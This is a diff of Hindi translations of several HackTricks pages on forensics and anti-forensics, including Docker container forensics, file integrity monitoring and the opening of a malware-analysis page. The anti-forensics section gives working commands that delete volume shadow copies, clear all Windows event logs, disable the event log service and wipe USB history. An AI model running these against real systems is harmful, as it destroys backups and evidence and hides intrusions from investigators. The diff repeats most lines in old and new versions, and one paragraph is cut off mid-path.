एनएफटीएस एक क्लस्टर और न्यूनतम जानकारी आकार का उपयोग करता है। इसका मतलब है कि यदि एक फ़ाइल एक क्लस्टर और आधा उपयोग करती है, तो **शेष आधा कभी भी उपयोग नहीं होगा** जब तक फ़ाइल हटाई नहीं जाती। फिर, इस "छुपी" जगह में डेटा छुपाना संभव है।
|
||||
|
||||
इस तरह के "छिपी" जगह में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था:
|
||||
इस तरह के "छुपे" स्थान में डेटा छुपाने की अनुमति देने वाले उपकरण जैसे slacker हैं। हालांकि, `$logfile` और `$usnjrnl` का विश्लेषण दिखा सकता है कि कुछ डेटा जोड़ा गया था:
|
||||
|
||||
![](<../../.gitbook/assets/image (452).png>)
|
||||
|
||||
फिर, FTK Imager जैसे उपकरण का उपयोग करके छिपी जगह पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अंधाकृत या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं।
|
||||
फिर, FTK इमेजर जैसे उपकरण का उपयोग करके छुपे स्थान को पुनः प्राप्त किया जा सकता है। ध्यान दें कि इस प्रकार के उपकरण सामग्री को अस्पष्ट या यहाँ तक कि एन्क्रिप्टेड भी सहेज सकते हैं।
|
||||
|
||||
# UsbKill
|
||||
|
||||
यह एक उपकरण है जो **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो कंप्यूटर को **बंद कर देगा**।\
|
||||
यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो बंद कर देगा।\
|
||||
इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच** करें।
|
||||
|
||||
# लाइव लिनक्स वितरण
|
||||
|
||||
ये डिस्ट्रो **रैम मेमोरी के अंदर चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमतियों के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा।
|
||||
ये डिस्ट्रो **रैम** मेमोरी के अंदर **चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि एनटीएफएस फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमति के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा।
|
||||
|
||||
# सुरक्षित मिटाना
|
||||
|
||||
[https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
|
||||
|
||||
# Windows कॉन्फ़िगरेशन
|
||||
# विंडोज कॉन्फ़िगरेशन
|
||||
|
||||
फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है।
|
||||
|
||||
## समय-चिह्नों को अक्षम करें - UserAssist
|
||||
## टाइमस्टैम्प्स को अक्षम करें - UserAssist
|
||||
|
||||
यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाशील द्वारा चलाई गई प्रत्येक कार्यक्रम के दिनांक और घंटे को बनाए रखती है।
|
||||
यह एक रजिस्ट्री कुंजी है जो प्रत्येक एक्जीक्यूटेबल को उपयोगकर्ता द्वारा चलाया गया था जब तारीख और समय बनाए रखती है।
|
||||
|
||||
UserAssist को अक्षम करने के लिए दो कदम हैं:
|
||||
|
||||
1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT_USER\SOFTWARE
|
||||
UserAssist को अक्षम करने के लिए दो
|
||||
## हटाएं USB इतिहास
|
||||
|
||||
सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जो उपकंजी शामिल करती हैं जो जब भी आप अपने PC या लैपटॉप में एक USB डिवाइस प्लग करते हैं। आप इस कुंजी को यहाँ पा सकते हैं `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`। **इसे हटाने** से आप USB इतिहास को हटा देंगे।\
|
||||
आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और इन्हें हटाने के लिए)।
|
||||
सभी **USB डिवाइस एंट्रीज** Windows रजिस्ट्री में **USBSTOR** रजिस्ट्री कुंजी के तहत संग्रहीत होती हैं जिसमें उप-कुंजी होती हैं जो जब भी आप अपने PC या लैपटॉप में USB डिवाइस प्लग करते हैं तो बनाई जाती हैं। आप इस कुंजी को यहाँ पा सकते हैं `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`। **इसे हटाने** से आप USB इतिहास को हटा देंगे।\
|
||||
आप इसे हटाने के लिए उपकरण [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) का भी उपयोग कर सकते हैं (और उन्हें हटाने के लिए)।
|
||||
|
||||
एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है, वह है फ़ाइल `setupapi.dev.log` `C:\Windows\INF` के अंदर। इसे भी हटाया जाना चाहिए।
|
||||
एक और फ़ाइल जो USBs के बारे में जानकारी सहेजती है वह है `setupapi.dev.log` जो `C:\Windows\INF` के अंदर होती है। इसे भी हटाना चाहिए।
|
||||
|
||||
## शैडो कॉपियों को अक्षम करें
|
||||
|
||||
`vssadmin list shadowstorage` के साथ शैडो कॉपियों की **सूची** बनाएं\
|
||||
उन्हें रन करके हटाएं `vssadmin delete shadow`
|
||||
उन्हें रन करके `vssadmin delete shadow` को **हटाएं**
|
||||
|
||||
आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [यहाँ प्रस्तावित चरणों](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) का पालन करें।
|
||||
आप GUI के माध्यम से भी उन्हें हटा सकते हैं जिसके लिए [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) में प्रस्तावित चरणों का पालन करें।
|
||||
|
||||
शैडो कॉपियों को अक्षम करने के लिए [यहाँ से चरण](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
|
||||
|
||||
1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके।
|
||||
2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुँचें।
|
||||
1. "सेवाएं" कार्यक्रम खोलें जिसे विंडोज स्टार्ट बटन पर क्लिक करने के बाद "सेवाएं" लिखकर टेक्स्ट खोज बॉक्स में टाइप करके खोल सकते हैं।
|
||||
2. सूची से "वॉल्यूम शैडो कॉपी" ढूंढें, इसे चुनें, और फिर राइट-क्लिक करके प्रॉपर्टीज़ तक पहुंचें।
|
||||
3. "स्टार्टअप प्रकार" ड्रॉप-डाउन मेनू से "डिसेबल्ड" चुनें, और फिर बदलाव की पुष्टि करने के लिए "एप्लाई" और "ओके" पर क्लिक करें।
|
||||
|
||||
यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी, उसकी विन्यास को संशोधित किया जा सकता है।
|
||||
यह भी संभव है कि रजिस्ट्री में `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` में कौन सी फ़ाइलें शैडो कॉपी में कॉपी की जाएंगी उनके विन्यास को संशोधित किया जा सके।
|
||||
|
||||
## हटाएं हटाए गए फ़ाइलें
|
||||
|
||||
* आप एक **Windows उपकरण** का उपयोग कर सकते हैं: `cipher /w:C` यह cipher को सी ड्राइव के उपलब्ध अप्रयुक्त डिस्क स्थान से किसी भी डेटा को हटाने के लिए संकेत देगा।
|
||||
* आप [**Eraser**](https://eraser.heidi.ie) जैसे उपकरण भी उपयोग कर सकते हैं
|
||||
|
||||
## हटाएं Windows घटना लॉग
|
||||
## हटाएं विंडोज घटना लॉग
|
||||
|
||||
* Windows + R --> eventvwr.msc --> "Windows Logs" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें
|
||||
* विंडोज + R --> eventvwr.msc --> "विंडोज लॉग" को विस्तारित करें --> प्रत्येक श्रेणी पर राइट क्लिक करें और "क्लियर लॉग" चुनें
|
||||
* `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
|
||||
* `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
|
||||
|
||||
## Windows घटना लॉग को अक्षम करें
|
||||
## विंडोज घटना लॉग को अक्षम करें
|
||||
|
||||
* `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
|
||||
* सेवाओं खंड के अंदर सेवा "Windows Event Log" को अक्षम करें
|
||||
* सेवाओं के भीतर सेवा "विंडोज घटना लॉग" को अक्षम करें
|
||||
* `WEvtUtil.exec clear-log` या `WEvtUtil.exe cl`
|
||||
|
||||
## $UsnJrnl को अक्षम करें
|
||||
|
|
|
@ -1,22 +1,23 @@
|
|||
# डॉकर फोरेंसिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## कंटेनर संशोधन
|
||||
|
||||
कुछ संदेह है कि किसी डॉकर कंटेनर को कंप्रोमाइज किया गया था:
|
||||
कुछ संदेह है कि किसी डॉकर कंटेनर में हमला हुआ था:
|
||||
```bash
|
||||
docker ps
|
||||
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
|
||||
|
@ -36,12 +37,12 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
|
|||
A /var/lib/mysql/mysql/general_log.CSV
|
||||
...
|
||||
```
|
||||
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया** है।\
|
||||
अगर आपको लगता है कि कुछ दिलचस्प फ़ाइल जैसे कि `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच के लिए कर सकते हैं:
|
||||
पिछले कमांड में **C** का मतलब **बदल गया** है और **A,** **जोड़ा गया**।
|
||||
अगर आपको लगता है कि कोई दिलचस्प फ़ाइल जैसे `/etc/shadow` में संशोधन किया गया है, तो आप इसे कंटेनर से डाउनलोड करके जांच सकते हैं कि क्या कोई हानिकारक गतिविधि है।
|
||||
```bash
|
||||
docker cp wordpress:/etc/shadow.
|
||||
```
|
||||
आप एक नए कंटेनर चलाकर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**:
|
||||
आप एक नए कंटेनर को चला कर इसकी मूल फ़ाइल को निकालकर इसे मूल फ़ाइल के साथ **तुलना कर सकते हैं**:
|
||||
```bash
|
||||
docker run -d lamp-wordpress
|
||||
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
|
||||
|
@ -53,14 +54,14 @@ docker exec -it wordpress bash
|
|||
```
|
||||
## छवि संशोधन
|
||||
|
||||
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में) तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग कर सकते हैं **संशोधनों का सारांश निकालने** के लिए:
|
||||
जब आपको एक निर्यातित डॉकर छवि दी जाती है (संभावित रूप में `.tar` प्रारूप में), तो आप [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) का उपयोग करके **संशोधनों का सारांश निकाल सकते हैं**:
|
||||
```bash
|
||||
docker save <image> > image.tar #Export the image to a .tar file
|
||||
container-diff analyze -t sizelayer image.tar
|
||||
container-diff analyze -t history image.tar
|
||||
container-diff analyze -t metadata image.tar
|
||||
```
|
||||
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संशयित फ़ाइलों की खोज कर सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
|
||||
फिर, आप **छवि को डीकंप्रेस** कर सकते हैं और **ब्लॉब्स तक पहुंच सकते हैं** जिससे आप संदेहपूर्ण फ़ाइलें खोज सकते हैं जो आपने परिवर्तन इतिहास में पाई हो सकती हैं:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
```
|
||||
|
@ -70,7 +71,7 @@ tar -xf image.tar
|
|||
```bash
|
||||
docker inspect <image>
|
||||
```
|
||||
आप यहाँ एक सारांश **परिवर्तन के इतिहास** प्राप्त कर सकते हैं:
|
||||
आप निम्नलिखित के साथ एक सारांश **परिवर्तन का इतिहास** प्राप्त कर सकते हैं:
|
||||
```bash
|
||||
docker history --no-trunc <image>
|
||||
```
|
||||
|
@ -90,16 +91,16 @@ Loaded image: flask:latest
|
|||
#And then open it with dive:
|
||||
sudo dive flask:latest
|
||||
```
|
||||
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** रंग जोड़ी गई को और **पीला** रंग संशोधित को दर्शाता है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** को फोल्डर को संक्षिप्त/खोलने के लिए करें।
|
||||
यह आपको **डॉकर इमेज के विभिन्न ब्लॉब के माध्यम से नेविगेट करने** और जांचने की अनुमति देता है कि कौन से फ़ाइलें संशोधित/जोड़ी गई थीं। **लाल** अर्थात जोड़ी गई है और **पीला** अर्थात संशोधित है। **टैब** का उपयोग दूसरे दृश्य में जाने के लिए और **स्पेस** का उपयोग फ़ोल्डर को संक्षेपित/खोलने के लिए करें।
|
||||
|
||||
इसके साथ आप इमेज के विभिन्न स्टेज के सामग्री तक पहुंच नहीं पाएंगे। इसे करने के लिए आपको **प्रत्येक लेयर को डीकंप्रेस करना और उस तक पहुंचना** होगा।\
|
||||
आप इमेज से सभी लेयर्स को डीकंप्रेस कर सकते हैं जिसे इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके:
|
||||
आप इमेज से सभी लेयर को डीकंप्रेस कर सकते हैं जो इमेज को डीकंप्रेस किया गया था उस निर्देशिका से जहां से इमेज को डीकंप्रेस किया गया था कार्यान्वित करके:
|
||||
```bash
|
||||
tar -xf image.tar
|
||||
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
|
||||
```
|
||||
## मेमोरी से क्रेडेंशियल्स
|
||||
|
||||
ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रोसेस देख सकते हैं** बस `ps -ef` चलाकर
|
||||
ध्यान दें कि जब आप एक होस्ट के अंदर एक डॉकर कंटेनर चलाते हैं **तो आप होस्ट से कंटेनर पर चल रहे प्रक्रियाएँ देख सकते हैं** बस `ps -ef` चलाकर
|
||||
|
||||
इसलिए (रूट के रूप में) आप **होस्ट से प्रोसेस की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** की खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।
|
||||
इसलिए (रूट के रूप में) आप **होस्ट से प्रक्रियाओं की मेमोरी डंप** कर सकते हैं और **क्रेडेंशियल्स** के लिए खोज कर सकते हैं बस [**निम्नलिखित उदाहरण की तरह**](../../linux-hardening/privilege-escalation/#process-memory)।
|
||||
|
|
|
@ -1,40 +1,54 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# मूल्यांकन
|
||||
# मूलाधार
|
||||
|
||||
एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**।
|
||||
एक मूलाधार किसी सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेने से बनता है ताकि **भविष्य की स्थिति की तुलना करने के लिए परिवर्तनों को हाइलाइट किया जा सके**।
|
||||
|
||||
उदाहरण के लिए, आप फ़ाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
|
||||
इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
|
||||
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फाइल का हैश गणना और स्टोर करना कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फाइलें संशोधित की गई थीं।\
|
||||
यह भी उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए।
|
||||
|
||||
## फ़ाइल अखंडता मॉनिटरिंग
|
||||
## फाइल अखंडता मॉनिटरिंग
|
||||
|
||||
फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं:
|
||||
फाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT परिवेश और डेटा को सुरक्षित रखती है। इसमें दो मुख्य चरण शामिल हैं:
|
||||
|
||||
1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें।
|
||||
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
|
||||
1. **मूलाधार तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके मूलाधार स्थापित करें ताकि संशोधनों का पता लगा सकें।
|
||||
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधन किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
|
||||
|
||||
## उपकरण
|
||||
|
||||
* [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
|
||||
* [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software)
|
||||
|
||||
# संदर्भ
|
||||
## संदर्भ
|
||||
|
||||
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# मैलवेयर विश्लेषण
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **हमें** **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## फोरेंसिक्स चीटशीट्स
|
||||
|
||||
|
@ -28,7 +29,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
## ऑफलाइन एंटीवायरस और पहचान उपकरण
|
||||
|
||||
### Yara
|
||||
### यारा
|
||||
|
||||
#### स्थापित
|
||||
```bash
|
||||
|
@ -37,7 +38,7 @@ sudo apt-get install -y yara
|
|||
#### नियम तैयार करें
|
||||
|
||||
